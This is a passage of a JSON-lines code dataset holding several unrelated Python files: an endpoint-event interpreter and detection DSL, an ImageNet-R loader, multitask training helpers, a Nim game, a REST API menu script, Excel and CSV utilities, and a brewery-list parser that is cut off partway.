else:\n try:\n if ( type(o) is str or type(o) is unicode ) and \"\\x00\" in o: raise Exception()\n json.dumps( o )\n except:\n o = base64.b64encode( o )\n if summarized is not False and len( str( o ) ) > summarized:\n o = str( o[ : summarized ] ) + '...'\n return o\n\nclass EventInterpreter( object ):\n def __init__( self, event = None ):\n if event is not None:\n self.setEvent( event )\n\n def setEvent( self, event ):\n self.event = event\n self.eventType = event.keys()[ 0 ]\n\n def description( self ):\n return _eventTypes.get( self.eventType, ( None, None, None, None ) )[ 0 ]\n\n def name( self ):\n return self.eventType.split( '.' )[ -1 ]\n\n def key( self ):\n f = _eventTypes.get( self.eventType, ( None, None, None, None ) )[ 1 ]\n if f is not None:\n return f( self.event )\n else:\n return None\n\n def shortKey( self ):\n f = _eventTypes.get( self.eventType, ( None, None, None, None ) )[ 2 ]\n if f is not None:\n return f( self.event )\n else:\n return None\n\n def narrative( self ):\n f = _eventTypes.get( self.eventType, ( None, None, None, None ) )[ 3 ]\n if f is not None:\n return f( self.event )\n else:\n return None\n\n def object( self ):\n f = _eventTypes.get( self.eventType, ( None, None, None, None ) )[ 4 ]\n if f is not None:\n return f( self.event )\n else:\n return ( None, None )\n\n def getAtom( self ):\n return normalAtom( _x_( self.event, '?/hbs.THIS_ATOM' ) )\n\n def getParentAtom( self ):\n return normalAtom( _x_( self.event, '?/hbs.PARENT_ATOM' ) )\n\n def __str__( self ):\n return '%s( %s )' % ( self.name(), self.key() )\n\n def getTimestamp( self ):\n return _x_( self.event, '?/base.TIMESTAMP' )\n\nclass EventDSL( object ):\n __slots__ = [ 'data', 'mtd', 'dataType', '_isCaseSensitive', '_reFlags', '_ops' ]\n\n def __init__( self, event, mtd, isCaseSensitive = False ):\n self.data = event\n self.mtd = mtd\n try:\n self.dataType = event.keys()[ 0 ]\n except:\n self.dataType = None\n self._isCaseSensitive = isCaseSensitive\n self._reFlags = 0 if isCaseSensitive else re.IGNORECASE\n self._ops = { 'path' : lambda e, v: _x_( e, '?/base.FILE_PATH' ) == v,\n 'pathEndsWith' : lambda e, v: re.match( '.*%s$' % re.escape( v ), _x_( e, '?/base.FILE_PATH' ), self._reFlags ),\n 'pathStartsWith' : lambda e, v: re.match( '^%s.*' % re.escape( v ), _x_( e, '?/base.FILE_PATH' ), self._reFlags ),\n 'pathMatches' : lambda e, v: re.match( v, _x_( e, '?/base.FILE_PATH' ), self._reFlags ),\n 'commandLine' : lambda e, v: _x_( e, '?/base.COMMAND_LINE' ) == v,\n 'commandLineEndsWith' : lambda e, v: re.match( '.*%s$' % re.escape( v ), _x_( e, '?/base.COMMAND_LINE' ), self._reFlags ),\n 'commandLineStartsWith' : lambda e, v: re.match( '^%s.*' % re.escape( v ), _x_( e, '?/base.COMMAND_LINE' ), self._reFlags ),\n 'commandLineMatches' : lambda e, v: re.match( v, _x_( e, '?/base.COMMAND_LINE' ), self._reFlags ),\n 'user' : lambda e, v: _x_( e, '?/base.USER_NAME' ) == v,\n 'userEndsWith' : lambda e, v: re.match( '.*%s$' % re.escape( v ), _x_( e, '?/base.USER_NAME' ), self._reFlags ),\n 'userStartsWith' : lambda e, v: re.match( '^%s.*' % re.escape( v ), _x_( e, '?/base.USER_NAME' ), self._reFlags ),\n 'userMatches' : lambda e, v: re.match( v, _x_( e, '?/base.USER_NAME' ), self._reFlags ),\n 'domain' : lambda e, v: _x_( e, '?/base.DOMAIN_NAME' ) == v,\n 'domainEndsWith' : lambda e, v: re.match( '.*%s$' % re.escape( v ), _x_( e, '?/base.DOMAIN_NAME' ), self._reFlags ),\n 'domainStartsWith' : lambda e, v: re.match( '^%s.*' % re.escape( v ), _x_( e, '?/base.DOMAIN_NAME' ), self._reFlags ),\n 'domainMatches' : lambda e, v: re.match( v, _x_( e, '?/base.DOMAIN_NAME' ), re.IGNORECASE ),\n 'cname' : lambda e, v: _x_( e, '?/base.CNAME' ) == v,\n 'cnameEndsWith' : lambda e, v: re.match( '.*%s$' % re.escape( v ), _x_( e, '?/base.CNAME' ), self._reFlags ),\n 'cnameStartsWith' : lambda e, v: re.match( '^%s.*' % re.escape( v ), _x_( e, '?/base.CNAME' ), self._reFlags ),\n 'cnameMatches' : lambda e, v: re.match( v, _x_( e, '?/base.CNAME' ), re.IGNORECASE ),\n 'ip' : lambda e, v: _x_( e, '?/base.IP_ADDRESS' ) == v,\n 'ipEndsWith' : lambda e, v: re.match( '.*%s$' % re.escape( v ), _x_( e, '?/base.IP_ADDRESS' ), self._reFlags ),\n 'ipStartsWith' : lambda e, v: re.match( '^%s.*' % re.escape( v ), _x_( e, '?/base.IP_ADDRESS' ), self._reFlags ),\n 'ipIn' : lambda e, v: ipaddress.ip_address( unicode( _x_( e, '?/base.IP_ADDRESS' ) ) ) in ipaddress.ip_network( unicode( v ) ),\n 'hash' : lambda e, v: re.match( '^%s$' % re.escape( v ), _x_( e, '?/base.HASH' ).encode( 'hex' ), re.IGNORECASE ),\n 'userId' : lambda e, v: _x_( e, '?/base.USER_ID' ) == v,\n 'dstIpIn' : lambda e, v: ipaddress.ip_address( unicode( _x_( e, 'base.DESTINATION/base.IP_ADDRESS' ) ) ) in ipaddress.ip_network( unicode( v ) ),\n 'srcIpIn' : lambda e, v: ipaddress.ip_address( unicode( _x_( e, 'base.SOURCE/base.IP_ADDRESS' ) ) ) in ipaddress.ip_network( unicode( v ) ),\n 'dstPort' : lambda e, v: _x_( e, 'base.DESTINATION/base.PORT' ) == v,\n 'srcPort' : lambda e, v: _x_( e, 'base.SOURCE/base.PORT' ) == v,\n 'isOutgoing' : lambda e, v: ( 1 == _x_( e, 'base.IS_OUTGOING' ) ) is v }\n\n def asJSON( self ):\n return _sanitizeJson( self.data )\n\n def atom( self ):\n return normalAtom( _x_( self.data, '?/hbs.THIS_ATOM' ) )\n\n def parentAtom( self ):\n return normalAtom( _x_( self.data, '?/hbs.PARENT_ATOM' ) )\n\n def Event( self, **kwargs ):\n if isinstance( self.data, dict ):\n e = self.data\n for k, v in kwargs.iteritems():\n if k not in self._ops:\n raise Exception( 'Detection Lambda operation \"%s\" invalid!' % k )\n try:\n if not self._ops[ k ]( e, v ):\n return False\n except:\n print( traceback.format_exc() )\n return False\n return True\n elif isinstance( self.data, list ):\n for e in self.data:\n isMatch = True\n for k, v in kwargs.iteritems():\n if k not in self._ops:\n raise Exception( 'Detection Lambda operation \"%s\" invalid!' % k )\n try:\n if not self._ops[ k ]( e, v ):\n isMatch = False\n break\n except:\n print( traceback.format_exc() )\n isMatch = False\n break\n if isMatch:\n return True\n return False\n\n def Process( self, **kwargs ):\n if self.dataType in ( 'notification.EXISTING_PROCESS', \n 'notification.NEW_PROCESS' ):\n return self.Event( **kwargs )\n elif self.dataType in ( 'notification.NETWORK_SUMMARY', ):\n subEvent = _x_( self.data, '?/base.PROCESS' )\n if subEvent is None:\n return False\n tmpEvent = EventDSL( { \"_\" : subEvent }, self.mtd )\n return tmpEvent.Event( **kwargs )\n return False\n\n def ParentProcess( self, **kwargs ):\n if self.dataType in ( 'notification.EXISTING_PROCESS', \n 'notification.NEW_PROCESS' ):\n subEvent = self.data.get( 'base.PARENT', None )\n if subEvent is None:\n return False\n tmpEvent = EventDSL( { \"_\" : subEvent }, self.mtd )\n return tmpEvent.Event( **kwargs )\n elif self.dataType in ( 'notification.NETWORK_SUMMARY', ):\n subEvent = _x_( self.data, '?/base.PROCESS/base.PARENT' )\n if subEvent is None:\n return False\n tmpEvent = EventDSL( { \"_\" : subEvent }, self.mtd )\n return False\n\n def Dns( self, **kwargs ):\n if 'notification.DNS_REQUEST' == self.dataType:\n return self.Event( **kwargs )\n return False\n\n def Hash( self, **kwargs ):\n if self.dataType in ( 'notification.CODE_IDENTITY', \n 'notification.ONGOING_IDENTITY' ):\n return self.Event( **kwargs )\n return False\n\n def NetworkSummary( self, **kwargs ):\n if 'notification.NETWORK_SUMMARY' == self.dataType:\n return self.Event( **kwargs )\n return False\n\n def Connections( self, **kwargs ):\n if self.dataType in ( 'notification.NETWORK_SUMMARY', ):\n subEvent = _xm_( self.data, '?/base.PROCESS/base.NETWORK_ACTIVITY' )\n if subEvent is None:\n return False\n tmpEvent = EventDSL( subEvent, self.mtd )\n return tmpEvent.Event( **kwargs )\n return False\n\n def UserObserved( self, **kwargs ):\n if 'notification.USER_OBSERVED' == self.dataType:\n return self.Event( **kwargs )\n return False\n\n def StartingUp( self, **kwargs ):\n if 'notification.STARTING_UP' == self.dataType:\n return self.Event( **kwargs )\n return False\n\n def Sync( self, **kwargs ):\n if 'notification.SYNC' == self.dataType:\n return self.Event( **kwargs )\n return False\n\n def Detection( self, name = None, **kwargs ):\n if self.dataType.startswith( 'detection_' ):\n if name is not None and self.dataType != ( 'detection_%s' % name ):\n return False\n return self.Event( **kwargs )\n return False","sub_path":"beach/hcp/utils/EventInterpreter.py","file_name":"EventInterpreter.py","file_ext":"py","file_size_in_byte":17033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"240043681","text":"import os\n\nfrom dassl.data.datasets import DATASET_REGISTRY, Datum, DatasetBase\nfrom dassl.utils import listdir_nohidden\n\nfrom .imagenet import ImageNet\n\nTO_BE_IGNORED = [\"README.txt\"]\n\n\n@DATASET_REGISTRY.register()\nclass ImageNetR(DatasetBase):\n \"\"\"ImageNet-R(endition).\n\n This dataset is used for testing only.\n \"\"\"\n\n dataset_dir = \"imagenet-rendition\"\n\n def __init__(self, cfg):\n root = os.path.abspath(os.path.expanduser(cfg.DATASET.ROOT))\n self.dataset_dir = os.path.join(root, self.dataset_dir)\n self.image_dir = os.path.join(self.dataset_dir, \"imagenet-r\")\n\n text_file = os.path.join(self.dataset_dir, \"classnames.txt\")\n classnames = ImageNet.read_classnames(text_file)\n\n data = self.read_data(classnames)\n\n super().__init__(train_x=data, test=data)\n\n def read_data(self, classnames):\n image_dir = self.image_dir\n folders = listdir_nohidden(image_dir, sort=True)\n folders = [f for f in folders if f not in TO_BE_IGNORED]\n items = []\n\n for label, folder in enumerate(folders):\n imnames = listdir_nohidden(os.path.join(image_dir, folder))\n classname = classnames[folder]\n for imname in imnames:\n impath = os.path.join(image_dir, folder, imname)\n item = Datum(impath=impath, label=label, classname=classname)\n items.append(item)\n\n return items\n","sub_path":"datasets/imagenet_r.py","file_name":"imagenet_r.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"461504085","text":"#! /usr/bin/python3\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport torch\nfrom torch import nn\n\n''' Given a trained classification model, an input set and an output set,\n this method predicts the class for the inputs and compares the \n predictions to the true targets. It counts the errors and computes \n the accuracy of the model on the given sets.\n \n Parameters : \n model: pytorch Model trained classification model\n X: tensor input data (features)\n Y: tensor target data (class)\n mini_batch_size: int specifies predictions batch size\n \n Returns : \n accuracy: float accuracy value, between 0 and 1\n'''\ndef accuracy_mt (model, X, Y, mini_batch_size=100) :\n nb_errors = 0\n \n # Proceed in batches\n for b in range(0, X.size(0), mini_batch_size):\n \n # Predict batch\n output = model(X.narrow(0, b, mini_batch_size))[0]\n _, predicted_classes = output.data.max(1)\n \n # Count errors in batch\n for k in range(mini_batch_size):\n if Y[b + k] != predicted_classes[k]:\n nb_errors = nb_errors + 1\n \n accuracy = 1 - nb_errors/X.shape[0]\n return accuracy\n\n\n''' Loss function for multitask-model\n Parameters : \n [...]\n model trained model so that : model : X -> ((pred_aux_1, pred_aux_2), pred_main)\n Y_aux tuple (targ_aux_1, targ_aux_2)\n'''\ndef loss_mt (model, X, Y_main, Y_aux,\n main_weight=0.5,\n loss_main=nn.CrossEntropyLoss(), loss_aux=nn.CrossEntropyLoss() ) :\n prediction_main, prediction_aux = model(X)\n # main loss\n mainloss = loss_main(prediction_main, Y_main)\n # aux loss\n auxloss1 = loss_aux(prediction_aux[0], Y_aux[0])\n auxloss2 = loss_aux(prediction_aux[1], Y_aux[1])\n auxloss = (auxloss1+auxloss2)/2.0\n # mix and return\n return main_weight*mainloss + (1-main_weight)*auxloss;\n \n \n\n \n''' This method trains a pytorch model on a given training set over the \n course of a specified number of epochs, evaluating its performance \n on a validation set at each epoch. It returns the training and \n validation history as a dict.\n Parameters\n Model trained model that produces (mainPred, (auxpred1, auxpred2))\n [...]\n trAuxY auxiliary results, shape (2, 1000)\n'''\ndef train_model_mt (\n model, \n trX, trY, trAuxY,\n valX, valY, valAuxY,\n eta=1e-3, mainLossWeight=0.5,\n mini_batch_size=100, epochs=25,\n criterion=nn.CrossEntropyLoss(), \n opt=torch.optim.Adam ) :\n \n history = {'train_loss':[], 'train_acc':[], 'val_loss':[], 'val_acc':[]}\n optimizer = opt(model.parameters(), lr=eta)\n \n for e in range(epochs):\n sum_loss = 0\n \n with torch.no_grad():\n # Compute validation loss and accuracy\n val_acc = accuracy_mt(model, valX, valY)\n history['val_acc'].append(val_acc)\n\n # Compute training accuracy w/o messing with training\n train_acc = accuracy_mt(model, trX, trY)\n history['train_acc'].append(train_acc)\n \n # Compute validation loss\n val_output = model(valX)\n val_loss = criterion(val_output[0], valY)\n history['val_loss'].append(val_loss.item())\n \n for b in range(0, trX.size(0), mini_batch_size):\n # Classify batch, compute loss and perform backpropagation with parameter updates\n # REPLACED : \n #xmain = model(X.narrow(0, b, mini_batch_size))\n #loss = criterion(output, Y.narrow(0, b, mini_batch_size))\n loss = loss_mt (\n model, \n trX.narrow(0, b, mini_batch_size), \n trY.narrow(0, b, mini_batch_size), \n trAuxY[:,b:b+mini_batch_size],\n main_weight=mainLossWeight\n )\n model.zero_grad()\n loss.backward()\n optimizer.step()\n sum_loss = sum_loss + loss.item()\n\n \n history['train_loss'].append(sum_loss)\n #clear_output(wait=True)\n print('Epoch ' + str(e+1) + '/' + str(epochs))\n \n return history\n \n","sub_path":"workspace/auxloss_basic/utils_mt.py","file_name":"utils_mt.py","file_ext":"py","file_size_in_byte":4289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"25752064","text":"\"\"\"\n Author : John Martinsson\n Summary : An implementation of the game Nim. The computer will play a perfect\n game if possible.\n\"\"\"\n\nimport random as rand\n\nclass Board():\n \"\"\" The board class\n \"\"\"\n def __init__(self):\n self.rows = []\n self.maxSticks = 5 # this is actually the max bits\n self.defaultBoard = [7, 5, 3]\n\n def getGameSettings(self):\n \"\"\" Get the settings for the board by the user\n \"\"\"\n data = input('| default or custom board? : ')\n while data != 'default' and data != 'custom':\n print('| Valid input: , ')\n data = input('| Default or custom board: ')\n\n if data == 'default':\n self.rows = self.defaultBoard\n if data == 'custom':\n while True:\n data = input('| Input number of sticks for row {} ({} max): '\n .format(len(self.rows), 2**self.maxSticks-1))\n \n if data == 'done':\n break\n \n try:\n if not int(data) > 2**self.maxSticks-1:\n self.rows.append(int(data))\n else:\n print('| To many sticks')\n except Exception:\n print('| Invalid input, to end enter:')\n\n def displayPosition(self):\n \"\"\" Display the position of the board (as sticks)\n \"\"\"\n print('|-----------------------------------------------------------------------')\n \n for r in range(len(self.rows)):\n row = self.rows[r]\n s = ['|' for i in range(row)]\n s = ''.join(s)\n template = '{0:15}{1:40}{2:50}'\n s1 = '| row {} :'.format(r)\n s2 = '({} sticks)'.format(row)\n\n print(template.format(s1, s, s2))\n\n print('|-----------------------------------------------------------------------\\n')\n\n def checkGameWon(self):\n \"\"\" Check if all sticks are taken, then the game is won.\n \n Returns\n -------\n Bool\n True if game is over, False otherwise\n \"\"\"\n return sum(self.rows) == 0\n\n def take(self, s, r):\n \"\"\" Take s sticks from the r:th row of this board.\n \n Returns\n -------\n Bool\n True if the move is valid, otherwise False\n \"\"\"\n # check enough sticks\n if(self.rows[r] >= s):\n self.rows[r] -= s\n return True\n else:\n return False\n\n def reverseTake(self, s, r):\n \"\"\" Reverse a move\n \"\"\"\n # reverse the take\n self.rows[r] += s\n\n\ndef checkParity(board):\n \"\"\" Checks the parity between the number of sticks in each row. This number is\n represented as a binary string. \n\n Examples\n --------\n \n Board 1\n -------\n row 0: 0111 (7 sticks)\n row 1: 0101 (5 sticks)\n row 2: 0011 (3 sticks)\n ------------------------\n Parity: 0001 (Odd)\n\n That is, there is an odd number of 1:s at the right most digit between each\n row, and so on. \n \n We say that the parity is even if we get all even, that\n is, 0000 in this case, which is a kernel position in this game. \n \n For example we could change the parity of the board in Ex.1 to even by \n taking 1 stick from row 2, which would turn Board 1 -> Board 2\n\n Board 2\n -------\n row 0: 6 = 0110 (6 sticks)\n row 1: 5 = 0101 (5 sticks)\n row 2: 3 = 0011 (3 sticks)\n ------------------------\n Parity: 0000 (Even)\n \"\"\"\n # initialize to parity 0\n parity = [0 for i in range(board.maxSticks)]\n for row in board.rows:\n # binary representation of row\n form = '{' + '0:0{}b'.format(board.maxSticks) + '}'\n b = form.format(row)\n for i in range(board.maxSticks):\n parity[i] += int(b[i])\n\n s = []\n for p in parity:\n if p%2 == 0:\n s.append('0')\n else:\n s.append('1')\n\n return ''.join(s)\n\ndef parityEven(board):\n \"\"\" Check if the board has an even parity\n \n Returns\n -------\n Bool\n True if even parity, False otherwise\n \"\"\"\n # if only zeroes in the parity string, we say that the parity is even\n return int(checkParity(board), 2) == 0\n\n\n\ndef computerMove(board):\n \"\"\" Perform the next computer move, will force the player into a kernel if\n possible, otherwise it will just take a stick from one of the rows.\n \n Parameters\n ----------\n board : Board()\n The board that is being played\n\n Returns\n -------\n Bool\n True if this move made the computer win, False otherwise\n \"\"\"\n # Loop over all possible moves, make move if it turns the board into a board\n # with even parity.\n for r in range(len(board.rows)):\n for i in range(board.rows[r]):\n s = i+1\n # try the move to take i sticks from r\n board.take(s, r)\n # The kernel position of this game is to put the opponent into a\n # position where the parity between all binary numbers are even. So\n # we check if this move leads to an even parity.\n if parityEven(board): \n print('Computer made move: {},{}'.format(s, r))\n\n if(board.checkGameWon()):\n print('#######################################################################')\n print('# You win! #')\n print('#######################################################################')\n board.displayPosition()\n return True\n else:\n board.displayPosition()\n return False\n # if not, simply reverse the move, and try the next one.\n else:\n board.reverseTake(s, r)\n\n # If the computer is in fact in a losing position, that is, the parity is\n # allready even, just some amount of sticks from a row, and be done with it.\n while True:\n # pick random row\n r = rand.randint(0, len(board.rows))\n # if it has more then one stick\n if board.rows[r] >= 1:\n # take a random amount of these sticks\n s = rand.randint(1, board.rows[r])\n board.take(s, r)\n print('Computer made move: {},{}'.format(1, r))\n board.displayPosition()\n\n return False\n\ndef playerMove(board):\n \"\"\" Get and perform the next player move, will display new board position, as well\n as check if the game is over.\n\n Parameters\n ----------\n board : Board()\n The board that is being played\n\n Return\n ------\n Bool\n True if player wins with this move, False otherwise\n \"\"\"\n # assumed form, (sticks,row)\n while True:\n try:\n playerMove = input('Enter next move: ') \n m = playerMove.split(',')\n s = int(m[0])\n r = int(m[1])\n\n if r < len(board.rows) and s <= board.rows[r]:\n board.take(s, r)\n break\n else:\n print('Invalid move')\n\n except Exception:\n print('Invalid input, try again. Valid input:')\n \n if(board.checkGameWon()):\n print('#######################################################################')\n print('# You win! #')\n print('#######################################################################')\n board.displayPosition()\n return True\n else:\n board.displayPosition()\n return False\n\ndef main():\n \"\"\" The main game loop\n \"\"\"\n # initialize the board\n board = Board()\n print('|-----------------------------------------------------------------------')\n print('| Game settings:')\n print('| : for a default board')\n print('| : for custom settings')\n print('| : when done entering custom settings')\n print('|-----------------------------------------------------------------------\\n')\n # get the game settings from the user\n print('|-----------------------------------------------------------------------')\n board.getGameSettings()\n print('|-----------------------------------------------------------------------\\n')\n # display the board position\n print('|=======================================================================')\n print('| The game has begun!')\n print('|=======================================================================')\n print('| Moves on form : : will take #sticks from r:th row')\n print('| Example : <3,0> : 3 sticks will be taken from row 0.')\n print('|')\n print('| Nim rules: http://en.wikipedia.org/wiki/Nim')\n print('|-----------------------------------------------------------------------\\n')\n\n board.displayPosition()\n playerWon = False\n computerWon = False\n\n # game main loop, loop until either player or computer has won\n while not playerWon and not computerWon:\n playerWon = playerMove(board)\n computerWon = computerMove(board)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"nim.py","file_name":"nim.py","file_ext":"py","file_size_in_byte":9632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"352023845","text":"# coding:utf-8\r\nimport os\r\nimport random\r\n\r\nimport numpy as np\r\nimport cv2\r\nfrom scipy.misc import imresize\r\nimport pandas as pd\r\n\r\ndef readFaceData(path,long=300,wide=300,deep=3):\r\n imageList = os.listdir(path)\r\n n = len(imageList)\r\n X = np.empty((n,long,wide,deep))\r\n Y = []\r\n for i,imageName in enumerate(imageList):\r\n X[i,:,:,:] = imresize(cv2.imread(path+'/'+imageName),(long,wide))\r\n Y.append(imageName[0:4])\r\n label = [Y[0],Y[-1]]\r\n return X,pd.get_dummies(np.array(Y)).values,label\r\n\r\n\r\ndef shuffle(X, Y):\r\n Y = np.array(Y)\r\n n = len(Y)\r\n index = random.sample(range(n), n)\r\n x_, y_ = X[index, :, :, :], Y[index,:]\r\n return x_, y_\r\n\r\n\r\ndef getTrainData(path=\"./data/trainingData\",longs=300,wide=300):\r\n X, Y,label = readFaceData(path, longs, wide)\r\n x_train,y_train = shuffle(X,Y)\r\n return x_train,y_train,label\r\n\r\n# x,y,label = getTrainData()\r\n# print(label)","sub_path":"faceDataHandle.py","file_name":"faceDataHandle.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"598140689","text":"#!/usr/bin/python3\n#from IPy import IP\nimport sys\nimport IPy\n\n\n# PROGRAM STARTING POINT\n#def start_program():\n# select_rest_api_call_type()\n\n\ndef select_rest_api_call_type():\n # List of master functions used with REST API\n try: \n print(\"##############################################################################\")\n print(\"######################## FUNCTION SELECTION ###########################\")\n print(\"##############################################################################\")\n print(\"1. GET\")\n print(\"2. PUT\")\n print(\"3. DELETE\")\n print(\"4. quit\")\n \n rest_api_call_type = int(input(\"Please select a function to continue: \"))\n \n #Verification value is valid...\n if 0 >= rest_api_call_type or rest_api_call_type >= 5: \n print(\"\\n***Incorrect Selection***\\n\\n\") \n else: \n pass \n except Exception as e: \n print(\"\\n\\n***oops***\") \n sys.exit(1)\n\n try: \n print(\"YOU MADE IT TO TOP_MENU\") \n if rest_api_call_type == 1: \n print(\"\\nYou chose to use GET\\n\") \n rest_api_call_type = \"GET\"\n elif rest_api_call_type == 2: \n print(\"\\nYou chose to use PUT\\n\") \n rest_api_call_type = \"PUT\"\n elif rest_api_call_type == 3: \n print(\"\\nYou chose to use DELETE\\n\") \n rest_api_call_type = \"DELETE\"\n elif rest_api_call_type == 4: \n print(\"\\nQUITTING APPLICATION\\n\") \n sys.exit(0) \n except Exception as e: \n print(\"\\n\\n***oops***2\") \n sys.exit(1)\n \n return rest_api_call_type\n\n\n# **************************** TARGET SERVER TYPE SELECTION ****************************\n#\n#Used to select the target server type, such as ISE, APICEM, CSR, ISR4K and any other platform that uses REST API\ndef select_target_server_type():\n # SUPPORTED SERVERS FOR API CALLS\n # DISPLAYS A LIST TO USER TO CHOOSE FROM\n print(\"\\nWelcome!\\nThese are the supported systems, please select a value by entering the corresponding \"\n \"numbered value\\n\")\n\n #Print possible options for target server types\n try: \n print(\"1. APIC-EM\") \n print(\"2. ISE\") \n print(\"3. CSR\") \n print(\"4. Quit\") \n \n target_server_type = int(input(\"\\nPlease select a SYSTEM TYPE to continue: \")) \n\n #Verification value is valid...\n if 0 >= target_server_type or target_server_type >= 5: \n print(\"\\n***Incorrect Selection***\\n\\n\") \n print(\"\\n*** Choose between 1 - 4 ***\\n\\n\") \n else: \n pass \n except Exception as e: \n print(\"\\n\\n***oops***\") \n sys.exit(1)\n \n try: \n if target_server_type == 1: \n print(\"\\nYou have selected APIC-EM \\n\") \n target_server_type = \"APIC-EM\" \n elif target_server_type == 2: \n print(\"\\nYou have selected ISE \\n\") \n target_server_type = \"ISE\" \n elif target_server_type == 3: \n print(\"\\nYou have selected CSR \\n\") \n target_server_type = \"CSR\" \n elif target_server_type == 4: \n print(\"\\nQUITTING APPLICATION\\n\") \n sys.exit(0) \n except Exception as e: \n print(\"\\n\\n***oops***\") \n sys.exit(1) \n \n return target_server_type \n\ndef api_controller_input():\n while True:\n try:\n\t\t #Ask for IP or FQDN\n #CURRENTLY ONLY ACCEPTS IP ADDRESS - FQDN CHECK FAILS.\n print(\"##############################################################################\")\n print(\"########################### APIC-EM URL ##############################\")\n print(\"##############################################################################\")\n fqdn_or_ip = IPy.IP(input(\"Please enter the server IP ADDRESS: \"))\n\t\t #USER REVIEWS ENTRY\n print(fqdn_or_ip + \"\\n\")\n if IPy.IP(fqdn_or_ip):\n print(\"1. YES\")\n print(\"2. NO\")\n socket_validate = int(input(\"Looks like you entered an IP address correct? \"))\n if (socket_validate == 1):\n print(\"GREAT! - Moving on....\\n\\n\")\n IPy.IP(fqdn_or_ip).strNormal\n return fqdn_or_ip\n else:\n continue\n else:\n print(\"1. YES\")\n print(\"2. NO\")\n socket_validate = int(input(\"Looks like you entered\" + fqdn_or_ip + \" correct? \"))\n if (socket_validate == 1):\n print(\"GREAT! LET'S MOVE ON TO THE SERVERS.\")\n IPy.IP(fqdn_or_ip).strNormal\n return fqdn_or_ip\n else:\n continue\n except ValueError:\n print(\"Sorry thats not valid try again\")\n\n \n#\n# Selection of which APIC-EM service will be called\n#\ndef select_apicem_service():\n try:\n print(\"1. INVENTORY\")\n print(\"2. NETWORK DISCOVERY\")\n print(\"3. TBD\")\n print(\"4. Quit\")\n\n apicem_service_type = int(input(\"Please select the FUNCTION category: \"))\n \n #Verification value is valid...\n if 0 >= apicem_service_type or apicem_service_type >= 5: \n print(\"\\n***Incorrect Selection***\\n\\n\") \n else: \n pass \n except Exception as e: \n print(\"\\n\\n***oops***\") \n sys.exit(1)\n\n try: \n if apicem_service_type == 1: \n print(\"\\nYou chose Inventory\\n\") \n apicem_service_type = \"INVENTORY\"\n if apicem_service_type == 2: \n print(\"\\nYou chose NETWORK DISCOVERY\\n\") \n apicem_service_type = \"NET-DISC\"\n if apicem_service_type == 3: \n print(\"\\nYou chose TBD\\n\") \n apicem_service_type = \"TBD\"\n if apicem_service_type == 4: \n print(\"\\nQUITTING APPLICATION\\n\") \n sys.exit(0)\n except Exception as e: \n print(\"\\n\\n***oops***3\") \n sys.exit(1)\n \n return apicem_service_type\n\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":6315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"463568407","text":"#!/usr/bin/env python3\nimport pandas as pd\nimport sys\n\ninput_file = 'xls/sales_2013.xlsx'\noutput_file = 'output/ex02_output.xls'\n\nmy_sheets = [0, 1] #sheet\nthreshold = 1900.0 #기준 값.\n\ndata_frame = pd.read_excel(input_file, sheet_name=my_sheets, index_col=None)\n\nrow_list = []\nfor worksheet_name, data in data_frame.items():\n row_list.append(data[data['Sale Amount'].astype(float) > threshold])\nfilter_rows = pd.concat(row_list, axis=0, ignore_index=True)\nwriter = pd.ExcelWriter(output_file)\nfilter_rows.to_excel(writer, sheet_name='set_of_worksheets', index=False)\nwriter.save()","sub_path":"FoundationsForAnalyticsWithPython/Week9/ex02_pandas_value_meets_condition_set_of_worksheets.py","file_name":"ex02_pandas_value_meets_condition_set_of_worksheets.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"632873092","text":"import math\n\n\nclass AreaCalculator:\n def calculate(self, shapes):\n area = 0\n\n for shape in shapes:\n if isinstance(shape, Square):\n area += (shape.width * shape.height)\n if isinstance(shape, Circle):\n area += math.pi * shape.radius ** 2\n\n return area\n\n\nclass Square:\n def __init__(self, width, height):\n self.width = width\n self.height = height\n\n\nclass Circle:\n def __init__(self, radius):\n self.radius = radius\n\n\ndef main():\n square_1 = Square(3, 5)\n square_2 = Square(4, 6)\n\n circle_1 = Circle(5)\n circle_2 = Circle(7)\n\n area_calculator = AreaCalculator()\n print(area_calculator.calculate([square_1, square_2, circle_1, circle_2]))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"design_principles/SOLID/OCP/bad/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"639959595","text":"import csv\n\ndef parse(filename):\n states = ['Name', 'Address', 'City-State', 'Phone', 'Type','Web']\n\n state = -1\n brewerList = []\n\n base = {'name':'', 'address':'', 'city-state':'', 'phone':'', 'type':'', 'web':''}\n brewer = base.copy()\n\n with open(filename) as F:\n for line in F.readlines():\n\n line = line.replace('\\n','')\n invalidLine = False\n if '----------' in line:\n invalidLine = True\n\n if '**********' in line:\n invalidLine = True\n\n if '&&&&&&&&&&' in line:\n invalidLine = True\n\n if '$$$$$$$$$$' in line:\n invalidLine = True\n\n if len(line) < 4:\n continue\n\n # Sense state:\n if 'Type:' in line:\n state = 4\n elif '| Map' in line:\n state = 2\n elif 'Phone:' in line:\n state = 3\n elif invalidLine:\n state = -1\n if len(brewer['name']) > 0:\n brewerList.append(brewer)\n brewer = base.copy()\n continue\n else:\n state += 1\n\n if state > 5:\n if len(brewer['name']) > 0:\n brewerList.append(brewer)\n brewer = base.copy()\n state = -1\n\n if state == 0:\n brewer['name'] = line.strip()\n elif state == 1:\n brewer['address'] = line.strip()\n elif state == 2:\n brewer['city-state'] = line.replace('| Map','').strip()\n elif state == 3:\n brewer['phone'] = 